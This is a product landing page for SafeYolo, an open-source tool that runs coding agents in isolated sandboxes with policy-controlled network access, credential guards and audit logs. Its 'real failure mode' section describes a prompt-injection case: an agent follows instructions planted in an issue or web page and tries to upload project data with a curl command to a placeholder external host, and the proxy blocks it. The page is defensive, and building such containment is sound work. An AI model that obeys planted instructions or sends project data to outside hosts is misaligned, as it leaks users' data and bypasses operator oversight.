SafeYolo

Let coding agents work. Control where they can reach.

SafeYolo runs Claude Code, OpenAI Codex and other coding agents in isolated Linux sandboxes with controlled network and service access.Give agents guest-local root to install tools, run browsers, start services and debug code - without giving them unrestricted access to your host or the Internet.

Pre-v1 · Open source · macOS Apple Silicon + LinuxBuilt by Threatspotting

THE PROBLEM

Agents need freedom to work. That shouldn't mean unlimited authority.Coding agents install packages, launch browsers, run development servers, call APIs and increasingly work unattended for long periods.Approve every operation and you lose the autonomy.
Give the agent your machine and unrestricted network access and every mistake, injected instruction or runaway loop gets the same authority you do.
The useful boundary is different:

  • Root inside the agent's sandbox, not on your host

  • Explicit external destinations and service capabilities

  • Service credentials kept outside the agent where possible

  • Limits on runaway network activity

  • A record of what the agent attempted and why it was allowed or blocked

SafeYolo separates local freedom from external authority.

WHAT SAFEYOLO DOES

Isolated workspace
Each agent gets its own Linux sandbox and persistent home:
hardware-backed microVMs on Apple Silicon macOS, rootless gVisor on Linux.
Controlled network access
The sandbox has no external network interface.
Traffic leaves through SafeYolo, with per-agent policy for
destinations, approvals, rate budgets and service capabilities.
Protected service credentials
The service gateway can keep credentials on the trusted host
and inject them only into authorised requests.
Credential guards restrict where detected secrets may be sent.
Visible work
Inspect HTTP(S) traffic and open sandboxed browser
or desktop previews while the agent works.
Limits and evidence
Rate budgets, circuit breakers and loop detection
constrain runaway activity.
Structured audit records preserve requests,
decisions and block reasons.

HOW IT FITS

YOUR TRUSTED HOST
Policy · approvals · credential vault
SafeYolo enforcement
│
controls │ boundary
│
AGENT SANDBOX — UNTRUSTED
Claude Code / Codex / tools
Guest-local root
Your selected workspace
No direct external network
│
▼
EXTERNAL SERVICES
Only through SafeYolo policy

On macOS: hardware-backed Linux microVMs.
On Linux: rootless gVisor.

A REAL FAILURE MODE

An agent encounters instructions in an issue,
dependency or web page telling it to send
project data to an external service.
It complies.

agent$ curl https://unknown.example/upload ...HTTP 428 — access not authorised
Destination is outside this agent's policy.

The agent cannot route around SafeYolo,
its sandbox has no direct external network interface.
If the request uses a service configured through SafeYolo's gateway,
the real service credential can remain on the host and is injected
only after the request is authorised.
The attempt - including the policy decision and reason -
is recorded for the operator.

INSTALL

SafeYolo is currently pre-v1 and installed from source.macOS requires Apple Silicon, Command Line Tools, Lima and tmux. Linux supports x86_64 and arm64 and uses gVisor for sandboxing.

git clone https://github.com/craigbalding/safeyolo.git
cd safeyolo
./install.sh
safeyolo bootstrap
On macOS:
make -C vm install
Then
safeyolo agent add work ~/code --host-script @claude
safeyolo agent run work

WHO IT’S FOR

  • Developers who want Claude Code, Codex or similar agents to work autonomously without giving them unrestricted host and network access

  • Teams running persistent or multiple coding agents that need per-agent boundaries, visibility and audit evidence

  • Security engineers using agents for browsers, APIs, testing and other workflows where external access needs to be controlled

  • Organisations experimenting with agent autonomy but unwilling to make “let it work” synonymous with “trust it with everything”

Headshot of Craig Balding

HELP / COMMERCIAL

SafeYolo is MIT-licensed open-source software.Threatspotting can help organisations use autonomous coding agents safely in real environments, including:

  • Agent sandbox and trust-boundary design

  • SafeYolo deployment and policy design

  • Service capability and credential architecture

  • Adversarial testing of agent containment and controls

  • Independent assurance and security review

  • Practical agent-security training for engineering and security teams

I've worked both sides of this problem: building security controls in regulated environments and breaking systems to test whether those controls really work.Email: [email protected]

SafeYolo is an independent, MIT-licensed pre-v1 project by Threatspotting Kft. The current implementation uses mitmproxy for its host proxy; macOS sandboxing uses Apple Virtualization.framework and Linux uses gVisor.© SafeYolo — Built by Threatspotting Ltd (Budapest) GitHub · Docs · License